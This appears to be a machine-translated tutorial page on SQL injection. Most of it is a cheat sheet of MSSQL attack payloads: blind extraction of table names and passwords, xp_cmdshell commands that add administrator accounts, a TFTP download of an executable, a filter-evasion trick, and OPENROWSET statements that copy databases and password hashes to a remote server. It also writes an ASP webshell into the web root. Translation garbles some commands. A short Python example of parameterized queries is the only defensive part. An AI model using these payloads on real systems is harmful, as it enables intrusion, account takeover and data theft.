Read online materials and learn about Injection

Source: Internet
Author: User
Tags: php mysql

With the spread of B/S (browser/server) application development, more and more programmers write programs in this mode, and a large number of these applications carry security risks: based on the results the program returns, a user can submit a piece of database query code and obtain the data they want. This is the so-called sqlinjection, that is, the SQL injection attack.

Attackers insert SQL commands into the input fields of web forms or into the query strings of page requests and trick the server into executing malicious SQL commands. In some forms, the content entered by the user is used directly to construct dynamic SQL commands or is passed as an input parameter to a stored procedure, and so the attacker can obtain the passwords or other information they want from the server.

Principle

The data of a website is its core. Once someone obtains or modifies that data, they may gain control over the whole site. As for how the data is obtained, leaving weak MSSQL passwords aside, the most likely remaining route is an injection vulnerability.

The most common dynamic web page we see works like this: the user submits a parameter from outside the site, the parameter goes to the database for processing, and the processed result is sent back to the user. But once this parameter is not filtered, the SQL statements we construct are carried into the database operation together with the parameter, and an SQL injection vulnerability is created.

It is normal for a website to accept data submitted from outside. Generally, the request is received as parameters and then processed, and database operations account for a large part of that processing.

For example, take an address that contains the parameter 1 and the variable Cs that passes it. This means there is a 1.asp file in the folder, and the Cs variable in 1.asp is used to accept an externally submitted parameter (1 here, but it could be anything). In 1.asp, the related code generally looks like this:

............

Cs = Request("ID")

Sqlserver = "select * from XX where id = '" & Cs & "'"

...............

Request reads the content of the ID variable, and then the SQL query is performed; the statement becomes select * from xx where id = 1.

That is easy enough to understand. Now apply the most classic injection vulnerability detection method: add ' after the parameter, and the query statement becomes

Sqlserver = select * from xx where id = '1''

The extra ' at the end causes a quote-closure problem, and if the input is not filtered the system prompts that the ' is not closed.

The principle of and 1 = 1 / and 1 = 2 (contributed by Bamboo) is the same:

Select * from xx where id = 1 and 1 = 1

Select * from xx where id = 1 and 1 = 2

1 = 1 is true and 1 = 2 is false; true and false gives false, so the second query yields an incorrect result.

Therefore the first address returns normally and the second address returns abnormally, and that difference is how the vulnerability is detected.
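To make the concatenation pattern and the ' / and 1 = 1 / and 1 = 2 checks above concrete, here is an added Python example (not code from the original page). It assumes an in-memory SQLite table named xx standing in for the page's ASP/SQL Server setup, and contrasts the concatenated query with a parameterized one under the same two checks.

```python
import sqlite3

# Constructed sample rows standing in for the page's "xx" table (not from the original page).
SAMPLE_ROWS = [(1, "first"), (2, "second"), (3, "third")]


def make_db():
    """In-memory SQLite database; SQLite plays the role of the page's Access/SQL Server back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table xx (id integer primary key, title text)")
    conn.executemany("insert into xx values (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, id_param):
    """Same shape as the page's ASP line: the request parameter is glued into the SQL text."""
    sql = "select * from xx where id = " + id_param
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, id_param):
    """The fix: the parameter travels as a bound value and is never parsed as SQL."""
    return conn.execute("select * from xx where id = ?", (id_param,)).fetchall()


def probe(lookup, conn, base="1"):
    """Run the page's two classic checks against one lookup function.

    quote_breaks_query: does appending ' raise a database error (the "not closed" prompt)?
    boolean_oracle:     do "and 1=1" and "and 1=2" return different results?
    An injectable sink answers True to both; the parameterized one answers False to both,
    because the whole string is compared as data and simply matches no row.
    """
    try:
        lookup(conn, base + "'")
        quote_breaks = False
    except sqlite3.Error:
        quote_breaks = True
    rows_true = lookup(conn, base + " and 1=1")
    rows_false = lookup(conn, base + " and 1=2")
    return {
        "quote_breaks_query": quote_breaks,
        "boolean_oracle": rows_true != rows_false,
        "rows_true": len(rows_true),
        "rows_false": len(rows_false),
    }


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", lookup_vulnerable), ("parameterized", lookup_parameterized)):
        print(name, probe(fn, db))
```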

The parameter can also be followed by another SQL statement, for example an update statement:

Update admin set passwd = 'poruin' where user = 'admin'

The query statement then becomes: Select * from xx where id = 1; and update admin set passwd = 'poruin' where User = 'admin'

This vulnerability is not specific to ASP+Access, ASP+SQL Server, PHP+MySQL or JSP+Oracle.

The above is SQL statement injection. DLL injection, by contrast, means creating a thread in the target process to load a DLL, and has nothing to do with this.

Common instances

1. Determine whether there is an injection point

; And 1 = 1 and 1 = 2

2. Generally, the table name is one of admin, adminuser, user, pass, password ..

And 0 <> (select count (*) from *)

And 0 <> (select count (*) from Admin) --- determine whether the admin table exists

3. Count the accounts: if "0 <" returns the correct page and "1 <" returns the error page, the number of accounts is 1.

And 0 <(select count (*) from Admin)

And 1 <(select count (*) from Admin)

4. Put the expected field name inside the brackets of Len().

And 1 = (select count (*) from Admin where Len (*)> 0 )--

And 1 = (select count (*) from Admin where Len (User field name)> 0)

And 1 = (select count (*) from Admin where Len (password field name)> 0)

5. Guess the length of each field: change the number after > until the correct page is returned.

And 1 = (select count (*) from Admin where Len (*)> 0)

And 1 = (select count (*) from Admin where Len (name)> 6) -- error

And 1 = (select count (*) from Admin where Len (name)> 5) -- correct, so the length is 6

And 1 = (select count (*) from Admin where Len (name) = 6) -- correct

And 1 = (select count (*) from Admin where Len (password)> 11) -- correct

And 1 = (select count (*) from Admin where Len (password)> 12) -- error, so the length is 12

And 1 = (select count (*) from Admin where Len (password) = 12) -- correct

6. escape characters

And 1 = (select count (*) from Admin where left (name, 1) = A) --- guesses the first place of the user account

And 1 = (select count (*) from Admin where left (name, 2) = AB) --- second place of the user account

In this way, adding one more character each time, you can guess up to the number of characters determined above, until the whole account comes out.

And 1 = (select top 1 count (*) from Admin where ASC (mid (Pass, 5, 1) = 51 )--

This query statement can also be used to guess Chinese user names and passwords: replace the trailing number with the ASCII code of the Chinese character, then convert the result back into characters.

Group by users. ID having 1 = 1 --

Group by users. ID, users. username, users. Password, users. privs having 1 = 1 --

; Insert into users values (666, attacker, foobar, 0 xFFFF )--

Union select top 1 column_name from information_schema.columns where table_name = logintable-

Union select top 1 column_name from information_schema.columns where table_name = logintable

Where column_name not in

(Login_id )-

Union select top 1 column_name from information_schema.columns where table_name = logintable

Where column_name not in

(Login_id, login_name )-

Union select top 1 login_name from logintable-

Union select top 1 password from logintable where login_name = Rahul --

Check the server patch level (whether SP4 is applied)

And 1 = (select @ version )--

Check the permissions of the database connection account: a normal return proves it has the SysAdmin server role.

And 1 = (select is_srvrolemember (SysAdmin ))--

Determine the database account used for the connection (a normal return proves the connection account is SA).

And SA = (select system_user )--

And user_name () = DBO --

And 0 <> (select user_name ()--

Check whether xp_cmdshell has been deleted.

And 1 = (select count (*) from Master. DBO. sysobjects where xtype = x and name = xp_mongoshell )--

Restore the extended procedure if it has been deleted; recovery with an absolute path is also supported.

; Exec master. DBO. sp_addextendedproc xp_mongoshell, xplog70.dll --

; Exec master. DBO. sp_addextendedproc xp_mongoshell, c: \ Inetpub \ wwwroot \ xplog70.dll --

Reverse ping your own machine

; Use master; declare @ s int; Exec sp_oacreate "wscript. Shell", @ s out; Exec sp_oamethod

@ S, "run", null, "cmd.exe/c Ping 192.168.0.1 ";--

Add an account

; Declare @ shell int exec sp_oacreatewscript.shell, @ shell output exec sp_oamethod

@ Shell, run, null, c: \ winnt \ system32 \ cmd.exe

/C net user jiaoniang $1866574/Add --

Create a virtual directory for the E: drive:

; Declare @ o int exec sp_oacreatewscript.shell, @ o out exec sp_oamethod

@ O,run,null,cscript.exe c: \ Inetpub \ wwwroot \ mkwebdir. vbs-W "Default web site"-V "E", "E :\"--

Set access attributes (also write a webshell):

Declare @ o int exec sp_oacreate wscript. Shell, @ o out exec sp_oamethod

@ O,run,null,cscript.exe c: \ Inetpub \ wwwroot \ chaccess. vbs-A w3svc/1/root/e + browse

Special tips for database explosion: % 5c =\or submit/and \ modify % 5

And 0 <> (select top 1 paths from newtable )--

Obtain the database name (dbid 1 to 5 are system databases; from 6 on they can be determined)

And 1 = (Select name from Master. DBO. sysdatabases where dbid = 7 )--

And 0 <> (select count (*) from Master. DBO. sysdatabases where Name> 1 and dbid = 6)

Submit dbid =, 9... to get more database names.

And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = u ).

And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = u and name not in (Admin)

Obtain other tables.

And 0 <> (select count (*) from BBS. DBO. sysobjects where xtype = u and name = Admin

And uid > (STR (ID)) -- brute-force the uid value; assume it is 18779569, and uid = ID

And 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 18779569)

field, assumed to be user_id

And 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 18779569 and name not in

(ID, ...)) to expose the other fields

And 0 <(select user_id from BBS. DBO. Admin where username> 1) to get the user name

The password can then be obtained in the same way. Assume that fields such as user_id, username and password exist.

And 0 <> (select count (*) from Master. DBO. sysdatabases where Name> 1 and dbid = 6)

And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = U)

And 0 <> (select top 1 name from BBS. DBO. sysobjects where xtype = u and name not in (Address ))

And 0 <> (select count (*) from BBS. DBO. sysobjects where xtype = u and name = admin and uid > (Str (ID))) -- determine the id value

And 0 <> (select top 1 name from BBS. DBO. syscolumns where id = 773577794) All fields

? Id =-1 Union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from Admin

? Id =-1 Union select 1, 2, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from Admin (Union also works on Access)

Obtain the web path

; Create Table [DBO]. [swap] ([swappass] [char] (255 ));--

And (select top 1 swappass from SWAp) = 1 --

; Create Table newtable (ID int identity (500), paths varchar () Declare @ test varchar (

20) exec master .. xp_regread

@ Rootkey = HKEY_LOCAL_MACHINE, @ key = System \ CurrentControlSet \ Services \ W3SVC \ Parameters \ virtual

Roots \, @ value_name = /,

[Email protected] insert into paths (PATH) values (@ test )--

; Use ku1 ;--

; Create Table cmd (STR image); -- create a table cmd with an image-type column

Test procedure with xp_cmdshell:

; Exec master .. xp_mongoshell dir

; Exec master. DBO. sp_addlogin jiaoniang $; -- add an SQL account

; Exec master. DBO. sp_password null, jiaoniang $, 1866574 ;--

; Exec master. DBO. SP_ADDSRVROLEMEMBER jiaoniang $ SysAdmin ;--

; Exec master. DBO. xp_mongoshell net user jiaoniang $1866574/workstations: */times: All

/Passwordchg: yes/passwordreq: Yes

/Active: yes/Add ;--

; Exec master. DBO. xp_mongoshell net localgroup administrators jiaoniang $/Add ;--

Exec master .. xp_servicecontrol start, schedule -- start the schedule service

Exec master .. xp_servicecontrol start, Server

; Declare @ shell int exec sp_oacreate wscript. Shell, @ shell output exec sp_oamethod

@ Shell, run, null, c: \ winnt \ System32

\ Cmd.exe/C net user jiaoniang $1866574/Add

; Declare @ shell int exec sp_oacreate wscript. Shell, @ shell output exec sp_oamethod

@ Shell, run, null, c: \ winnt \ system32 \ cmd.exe

/C net localgroup administrators jiaoniang $/Add

Exec master.. xp_cmdshell TFTP-I youip get file.exe -- use TFTP to upload files

; Declare @ A sysname set @ A = XP _ + export shell exec @ A dir c :\

; Declare @ A sysname set @ A = XP + _ cm '+ 'dshell exec @ A dir c :\

; Declare @ A; Set @ A = db_name (); backup database @ A to disk = your IP address your shared directory Bak. dat

If it is restricted, you can use:

Select * From OpenRowSet (sqloledb, server; SA;, select OK! Exec master. DBO. sp_addlogin Hax)

Query structure:

Select * from news where id =... and topic =... and .....

Adminand 1 = (select count (*) from [user] Where username = victim and right (left

(Userpass, 01), 1) = 1) and userpass <>

Select 123 ;--

; Use master ;--

: A or name like fff %; -- displays a user named FFFF.

And 1 <> (select count (email) from [user]); --

; Update [users] Set email = (select top 1 name from sysobjects where xtype = u and status> 0)

Where name = FFFF ;--

; Update [users] Set email = (select top 1 ID from sysobjects where xtype = u and name = AD)

Where name = FFFF ;--

; Update [users] Set email = (select top 1 name from sysobjects where xtype = u and

ID & gt; 581577110) Where name = FFFF ;--

; Update [users] Set email = (select top 1 count (ID) from password) Where name = FFFF ;--

; Update [users] Set email = (select top 1 PWD from password where id = 2) Where name = FFFF ;--

; Update [users] Set email = (select top 1 name from password where id = 2) Where name = FFFF ;--

The preceding statements obtain the first user table in the database and put the table name into the FFFF user's email field; viewing the FFFF user's information then reveals the first table, named ad.

Next, the ID of the table is obtained from the table name ad, and from that the name of the second table is obtained.

Insert into users values (666, char (0x63) + char (0x68) + char (0x72) + char (0x69) + char

(0x73), char (0x63) + char (0x68) + char (0x72) + char

(0x69) + char (0x73), 0 xFFFF )--

Insert into users values (667,123,123, 0 xFFFF )--

Insert into users values (123, admin --, password, 0 xFFFF )--

; And user> 0

; And (select count (*) from sysobjects)> 0

; And (select count (*) from mysysobjects)> 0 // Access Database

Obtain the name of a data table

; Update AAA set AAA = (select top 1 name from sysobjects where xtype = u and status> 0 );--

This updates the AAA field to the name of the first table.

Read the first table. The second table can be read the same way by adding "and name <> the table name just obtained" to the condition.

; Update AAA set AAA = (select top 1 name from sysobjects where xtype = u and status> 0 and

Name <> vote );--

Then Id = 1552 and exists (select * from AAA where AAA> 5)

Read the tables one by one in this way until there are none left.

Read the fields as follows:

; Update AAA set AAA = (select top 1 col_name (object_id (table name), 1 ));--

Then Id = 152 and exists (select * from AAA where AAA> 5) error.

; Update AAA set AAA = (select top 1 col_name (object_id (table name), 2 ));--

Then Id = 152 and exists (select * from AAA where AAA> 5) error.

[Obtain the data table name] [update a field value to the table name, then read that field's value to get the table name]

Update table_name set field = (select top 1 name from sysobjects where xtype = u and status > 0 [and name <> the table name you already obtained]) [where condition]

Select top 1 name from sysobjects where xtype = u and status > 0 and name not in (Table1, Table2, ...)

Create a database administrator account and a system administrator account through the SQL Server injection vulnerability [the current account must be in the SysAdmin group]

[Obtain the field names of a data table] [update a field value to the field name, then read that field's value to get the field name]

Update table_name set field = (select top 1 col_name (object_id (name of the data table to query), column number, for example 1)) [where condition]

Bypassing IDS detection [using variables]

; Declare @ A sysname set @ A = XP _ + export shell exec @ A dir c :\

; Declare @ A sysname set @ A = XP + _ cm '+ 'dshell exec @ A dir c :\

Enable remote database

Basic syntax

Select * From OpenRowSet (sqloledb, Server = servername; uid = sa; Pwd = 123, select * From Table1)

Parameters: (1) the OLE DB provider name; (2) the connection string, which can use any port for the connection, for example:

Select * From OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from table

Copy all tables of the target host's entire database to the local machine.

Basic Syntax:

Insert into OpenRowSet (sqloledb, Server = servername; uid = sa; Pwd = 123, select * From Table1)

Select * From Table2

This statement copies all the data in Table2 on the target host to Table1 in the remote database. In practical use, modify the IP address and port in the connection string to point where you want, for example:

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From Table1)

Select * From Table2

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from

_ Sysdatabases)

Select * from Master. DBO. sysdatabases

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from

_ Sysobjects)

Select * From user_database.dbo.sysobjects

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from

_ Syscolumns)

Select * From user_database.dbo.syscolumns

Copy a database:

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From Table1)

Select * from database..Table1

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * From table2)

Select * from database..Table2

Copy the password hashes stored in sysxlogins. The method is as follows:

Insert into OpenRowSet

(Sqloledb, uid = sa; Pwd = 123; Network = dbmssocn; address = 192.168.0.1, 1433;, select * from

_ Sysxlogins) Select * From database. DBO. sysxlogins

After obtaining the hashes, brute-force cracking can be performed.

To traverse directories, create a temporary table temp:

; Create Table temp (ID nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--

; Insert temp exec master. DBO. xp_availablemedia; -- get all current drives

; Insert into temp (ID) exec master. DBO. xp_subdirs C :\; -- get the subdirectory list

; Insert into temp (ID, num1) exec master. DBO. xp_dirtree c: \; -- get the directory tree of all subdirectories and write it into the temp table

; Insert into temp (ID) exec master. DBO. xp_shareshell Type C: \ WEB \ index. asp; -- view the file content

; Insert into temp (ID) exec master. DBO. xp_shareshell dir c :\;--

; Insert into temp (ID) exec master. DBO. xp_shareshell dir c: \ *. asp/S/;--

; Insert into temp (ID) exec master. DBO. xp_cmdshell cscript. c: \ Inetpub \ adminscripts \ Adsutil. vbs Enum w3svc

; Insert into temp (ID, num1) exec master. DBO. xp_dirtree c: \; -- (xp_dirtree is executable by public)

Write table:

Statement 1: And 1 = (select is_srvrolemember (SysAdmin ));--

Statement 2: And 1 = (select is_srvrolemember (serveradmin ));--

Statement 3: And 1 = (select is_srvrolemember (setupadmin ));--

Statement 4: and 1 = (select is_srvrolemember (securityadmin ));--

Statement 5: and 1 = (select is_srvrolemember (securityadmin ));--

Statement 6: and 1 = (select is_srvrolemember (diskadmin ));--

Statement 7: and 1 = (select is_srvrolemember (bulkadmin ));--

Statement 8: and 1 = (select is_srvrolemember (bulkadmin ));--

Statement 9: and 1 = (select is_member (db_owner ));--

Write the paths to a table:

; Create Table dirs (paths varchar (100), Id INT )--

; Insert dirs exec master. DBO. xp_dirtree c :\--

And 0 <> (select top 1 paths from dirs )--

And 0 <> (select top 1 paths from dirs where paths not in (@ inetpub ))--

; Create Table dirs1 (paths varchar (100), Id INT )--

; Insert dirs exec master. DBO. xp_dirtree E: \ Web --

And 0 <> (select top 1 paths from dirs1 )--

Back up the database to the web directory, then download it:

; Declare @ A sysname; Set @ A = db_name (); backup database @ A to disk = E: \ WEB \ down. bak ;--

And 1 = (select top 1 name from (select Top 12 ID, name from sysobjects where xtype = char (85)) T order by id desc)

And 1 = (select top 1 col_name (object_id (user_login), 1) from sysobjects) See related tables.

And 1 = (select user_id from user_login)

And 0 = (Select User From user_login where user> 1)

-=- Wscript.Shell example -=-

Declare @ o int

Exec sp_oacreate wscript. Shell, @ o out

Exec sp_oamethod @o,run,null,notepad.exe

; Declare @ o int exec sp_oacreate wscript. Shell, @ o out exec sp_oamethod

@ O,run,null,notepad.exe --

Declare @ o int, @ F int, @ t int, @ RET int

Declare @ line varchar (8000)

Exec sp_oacreate scripting. FileSystemObject, @ o out

Exec sp_oamethod @ o, opentextfile, @ F out, c: \ Boot. ini, 1

Exec @ ret = sp_oamethod @ F, Readline, @ line out

While (@ ret = 0)

Begin

Print @ line

Exec @ ret = sp_oamethod @ F, Readline, @ line out

End

Declare @ o int, @ F int, @ t int, @ RET int

Exec sp_oacreate scripting. FileSystemObject, @ o out

Exec sp_oamethod @ o, createtextfile, @ F out, c: \ Inetpub \ wwwroot \ Foo. asp, 1

Exec @ ret = sp_oamethod @ F, writeline, null,

<% Set O = server. Createobject ("wscript. Shell"): O. Run (request. querystring ("cmd") %>

Declare @ o int, @ RET int

Exec sp_oacreate speech. voicetext, @ o out

Exec sp_oamethod @ o, register, null, Foo, bar

Exec sp_oasetproperty @ o, speed, 150

Exec sp_oamethod @ o, speak, null, all your sequel servers are belong to, US, 528 waitfor Delay 00:00:05

; Declare @ o int, @ RET int exec sp_oacreate speech. voicetext, @ o out exec sp_oamethod

@ O, register, null, Foo, bar Exec

Sp_oasetproperty @ o, speed, 150 exec sp_oamethod @ o, speak, null, all your sequel servers are

Belong to us, 528 waitfor delay 00:00:05 --

xp_dirtree has public permission

Exec master. DBO. xp_dirtree c :\

The returned information includes two fields, subdirectory and depth: subdirectory is a character field and depth is an integer field.

Create Table dirs (paths varchar (100), Id INT)

Create a table. The table created here matches the preceding xp_dirtree: the same number of fields with the same types.

Insert dirs exec master. DBO. xp_dirtree c :\

As long as the table definition matches the fields returned by the stored procedure, the insert can be executed to write into the table.
